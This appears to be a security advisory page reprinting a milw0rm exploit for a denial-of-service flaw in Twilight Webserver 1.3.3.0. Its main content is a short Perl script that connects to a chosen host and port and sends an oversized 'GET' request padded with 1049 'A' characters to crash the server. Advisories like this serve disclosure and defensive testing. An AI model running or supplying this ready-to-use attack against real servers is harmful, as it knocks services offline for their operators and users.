|
Brought to you by:
Suppliers of:
|
|
|
| |
Twilight Webserver is a simple HTTP server for home use.
Vulnerability in Twilight WebServer allows remote attackers to cause a denial of service attack against the product. |
| |
Credit:
The original article can be found at: http://www.milw0rm.com/exploits/3138
Related article can be found at: Twilight Utilities Denial of Service Vulnerability (TW-WebServer)
|
| |
Vulnerable Systems:
* Twilight Webserver version 1.3.3.0
Exploit:
# Denial of Service Attack against Twilight Webserver v1.3.3.0
# http://www.twilightutilities.com
# Original author wanted the c code removed.
# /str0ke
use strict;
use IO::Socket;
sub usage
{
print "Denial of Service Attack against Twilight Webserver v1.3.3.0\n";
print "Usage: $0 www.example.com port\n";
exit ();
}
my $host= shift || &usage;
my $port= shift || 80;
my $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => 'tcp') or die("Connect issue");
# pretty close to the output of the c code.
print $sock "GET" . "A" x 1049 . "\r\n";
|
|
|
|
|